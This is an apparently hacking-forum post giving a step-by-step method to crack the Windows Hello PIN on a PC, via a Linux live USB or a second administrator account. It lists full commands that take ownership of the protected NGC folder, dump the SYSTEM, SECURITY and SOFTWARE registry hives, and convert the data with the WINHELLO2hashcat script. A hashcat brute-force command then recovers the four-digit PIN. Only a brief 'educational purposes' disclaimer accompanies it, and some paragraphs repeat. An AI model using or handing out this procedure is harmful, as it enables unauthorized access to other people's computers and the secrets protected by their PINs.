OP 12 January, 2025 - 05:16 PM
I recently had a chance to try out excellent way for cracking the PIN on Windows PCs. The needed files are protected, of course, but there are two ways to do it. The first (and easiest) method is to boot the PC using a Linux live USB or connecting the unencrypted system drive to another computer. Or you can run the script from another administrator account on the running machine. You will need to run the first set of commands to get access to the NGC folder and registry hives. The instructions on the GitHub README do not work. Also, make sure to install Python and the dpapick3 module first.
On Linux:
Now run 'hashcat -m 28100 -a 3 hash.txt ?d?d?d?d'. PIN number should be output in a second or so.
As a final note, it's important to check the 2.dat file in NGC\GUID\Protectors\1-folder for the PIN_GUID and the 1.dat file in that folder to verify that "MS Platform Provider" is not present. Otherwise, a TPM is used to store secrets (likely the case for 2018 models and later)
Finally, guide is for educational purposes only to be used on your local environment or authorized use. Good luck you all
Code:
Administrator Command Prompt:
TAKEOWN /f %windir%\ServiceProfiles\LocalService\AppData\Local\Microsoft\Ngc /r /D Y
ICACLS %windir%\ServiceProfiles\LocalService\AppData\Local\Microsoft\Ngc /grant "%username%":(F) /t
reg save hklm\system SYSTEM
reg save hklm\security SECURITY
reg save hklm\software SOFTWARE
python WINHELLO2hashcat.py --cryptokeys "%windir%\ServiceProfiles\LocalService\AppData\Roaming\Microsoft\Crypto\Keys" --masterkey "%windir%\\Windows\System32\Microsoft\Protect\S-1-5-18\User" --system SYSTEM --security SECURITY --software SOFTWARE --ngc "%windir%\ServiceProfiles\LocalService\AppData\Local\Microsoft\Ngc" > hash.txtOn Linux:
Code:
sudo mkdir /mnt/windows
sudo mount /dev/<windows system partition> /mnt/windows
git clone https://github.com/Banaanhangwagen/WINHELLO2hashcat.git
cd WINHELLO2hashcat
sudo python3 WINHELLO2hashcat.py --windows /mnt/windows/Windows > hash.txtNow run 'hashcat -m 28100 -a 3 hash.txt ?d?d?d?d'. PIN number should be output in a second or so.
As a final note, it's important to check the 2.dat file in NGC\GUID\Protectors\1-folder for the PIN_GUID and the 1.dat file in that folder to verify that "MS Platform Provider" is not present. Otherwise, a TPM is used to store secrets (likely the case for 2018 models and later)
Finally, guide is for educational purposes only to be used on your local environment or authorized use. Good luck you all
Clicking the like button will motivate for more threads ❤️